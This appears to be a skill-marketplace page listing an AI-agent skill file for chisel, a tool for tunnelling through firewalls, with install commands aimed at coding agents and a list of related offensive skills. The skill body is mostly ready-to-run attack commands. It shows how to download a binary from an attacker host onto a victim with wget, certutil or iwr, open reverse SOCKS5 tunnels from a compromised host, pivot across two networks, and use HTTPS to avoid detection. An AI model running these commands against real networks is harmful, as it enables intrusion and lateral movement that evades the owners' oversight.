aeondave/chisel
offensive-tools/network/chisel/SKILL.md
HTTP-based TCP/UDP tunneling tool for port forwarding and SOCKS5 proxying through firewalls. Use when pivoting into internal networks without root/TUN interface, tunneling traffic over HTTP/HTTPS to bypass firewalls, or creating a SOCKS5 proxy through a compromised host. Complements ligolo-ng when TUN interfaces are unavailable.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill chiselInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: May 19, 2026, 4:47 AM160.3s2 files scanned
SKILL.md
- name:
- chisel
- description:
- HTTP-based TCP/UDP tunneling tool for port forwarding and SOCKS5 proxying through firewalls. Use when pivoting into internal networks without root/TUN interface, tunneling traffic over HTTP/HTTPS to bypass firewalls, or creating a SOCKS5 proxy through a compromised host. Complements ligolo-ng when TUN interfaces are unavailable.
- license:
- MIT
- compatibility:
- Linux, Windows, macOS. Single binary, no dependencies. Download prebuilt from github.com/jpillora/chisel/releases.
- author:
- AeonDave
- version:
- 1.0
Chisel
HTTP/HTTPS TCP tunneling — SOCKS5 proxy and port forwarding without TUN interfaces or root.
Architecture
Attacker (server) ←—HTTP tunnel— Victim (client) ——→ Internal network
port 8080 pivot host 192.168.1.0/24
Works where ligolo-ng can't: no root needed, no TUN interface, works through web proxies.
Quick Start
# Attacker — start server
./chisel server -p 8080 --reverse
# Victim — connect client + open SOCKS5 proxy on attacker
./chisel client <attacker_ip>:8080 R:1080:socks
# Attacker — route tools via SOCKS5
proxychains nmap -sT 192.168.1.0/24
proxychains nxc smb 192.168.1.0/24
Transfer Binary to Target
# Serve from attacker
python3 -m http.server 80
# Linux target
wget http://<attacker>/chisel -O /tmp/chisel && chmod +x /tmp/chisel
# Windows target
certutil -urlcache -split -f http://<attacker>/chisel.exe C:\Windows\Temp\chisel.exe
# or
iwr -Uri http://<attacker>/chisel.exe -OutFile C:\Windows\Temp\chisel.exe
Modes
Reverse SOCKS5 (most common — attacker gets proxy)
# Attacker
./chisel server -p 8080 --reverse
# Victim (creates SOCKS5 on attacker:1080)
./chisel client <attacker>:8080 R:1080:socks
# proxychains.conf
socks5 127.0.0.1 1080
proxychains curl http://192.168.1.50
proxychains evil-winrm -i 192.168.1.50 -u admin -p pass
Reverse Port Forward (expose internal port on attacker)
# Attacker
./chisel server -p 8080 --reverse
# Victim (forward internal 192.168.1.50:445 to attacker:4455)
./chisel client <attacker>:8080 R:4455:192.168.1.50:445
# Attacker uses attacker:4455 to reach internal SMB
smbclient -L //127.0.0.1 -p 4455 -U user
Forward SOCKS5 (victim opens local SOCKS proxy)
# Victim starts server
./chisel server -p 8080 --socks5
# Attacker connects + gets SOCKS5 through victim
./chisel client <victim>:8080 1080:socks
Forward Port (attacker reaches internal service directly)
# Victim starts server
./chisel server -p 8080
# Attacker: forward localhost:8888 → internal 192.168.1.100:80
./chisel client <victim>:8080 8888:192.168.1.100:80
curl http://127.0.0.1:8888
HTTPS Mode (avoid cleartext HTTP detection)
# Attacker — server with TLS
./chisel server -p 443 --reverse --tls-key server.key --tls-cert server.crt
# Or self-signed (auto-generated)
./chisel server -p 443 --reverse
# Victim — skip cert verify
./chisel client --tls-skip-verify https://<attacker>:443 R:1080:socks
Authentication (prevent unauthorized use)
# Attacker
./chisel server -p 8080 --reverse --auth user:secretpass
# Victim
./chisel client --auth user:secretpass <attacker>:8080 R:1080:socks
Multiple Tunnels (single client connection)
# Victim creates both SOCKS5 and specific port forward
./chisel client <attacker>:8080 R:1080:socks R:4455:192.168.1.50:445
Double Pivot
Attacker → Pivot1 → Pivot2 → Internal2
# Attacker — start server
./chisel server -p 8080 --reverse
# Pivot1 connects, opens SOCKS5 on attacker:1080
./chisel client <attacker>:8080 R:1080:socks
# Configure proxychains to use 127.0.0.1:1080
# From attacker, reach pivot2 via pivot1's SOCKS5:
proxychains ./chisel server -p 9090 --reverse &
# Pivot2 connects to pivot1:9090 (via pivot1's local service)
# Pivot2 client → 192.168.2.0/24 SOCKS5 on attacker:2080
./chisel client <pivot1_ip>:9090 R:2080:socks
vs ligolo-ng
| Feature | chisel | ligolo-ng | |---------|--------|-----------| | Root required | No | Yes (TUN) | | Speed | Medium (HTTP) | Fast (TUN layer) | | Tool compatibility | proxychains needed | Native (TUN routes) | | UDP support | Limited | Yes | | Firewall bypass | Excellent (HTTP/S) | Requires raw TCP | | Best for | No-root pivots, HTTP-allowed nets | Full network routing |
Resources
| File | When to load |
|------|--------------|
| references/proxychains.md | proxychains config, dynamic chain, DNS leak prevention, tool compatibility |
Related Skills
aeondave/offensive-linux-role
data-ai
VerifiedTrustedCommunity
Scoped routing: Linux operator; hosts, sessions, users, services, packages, logs, containers, SSH, network paths, privilege evidence.
4SKILL.mdUpdated Jun 5, 2026
aeondave/ics-technique
development
VerifiedTrustedCommunity
Offensive methodology for ICS/OT/SCADA environments in authorized industrial penetration testing and red team operations. Use when assessing PLCs, RTUs, HMIs, engineering workstations, historians, or field devices running Modbus, DNP3, EtherNet/IP, S7comm/S7+, Profinet, IEC 60870-5-104, BACnet, or OPC-UA. Covers passive OT network enumeration, protocol-level device interrogation, PLC coil/register read-write attacks, HMI session exploitation, historian and engineering workstation compromise, and safe escalation rules for critical infrastructure scope. Does not cover: general IT network exploitation (network-technique), physical hardware interfaces UART/JTAG/SPI (hardware-technique), wireless sensor network attacks (wireless-technique), RF/SDR signal analysis (hardware-ctf or wireless-technique), or CTF-framed ICS lab tasks (ics-ctf).
4SKILL.mdUpdated Jun 2, 2026
aeondave/game-technique
tools
VerifiedTrustedCommunity
Offensive methodology for authorized game security assessments, game client security research, and game-adjacent penetration testing in real-world engagements. Use when assessing game clients for cheating vulnerabilities, testing anti-cheat effectiveness, auditing game server protocols for score manipulation or economic fraud, reverse engineering game DRM or license validation, analyzing game save file protection, or assessing game mod/plugin security. Covers: process memory scanning and manipulation (Cheat Engine methodology), game binary reversing for license and DRM bypass, game network protocol analysis and packet replay, anti-cheat mechanism analysis, save file format reversing and tampering, speed hack and value injection techniques. Does NOT cover: CTF game challenges (game-ctf), game engine source code auditing (web-exploit-technique or vuln-search-technique for the backend), or general binary exploitation (pwn-ctf or reversing-technique).
4SKILL.mdUpdated Jun 2, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 2, 2026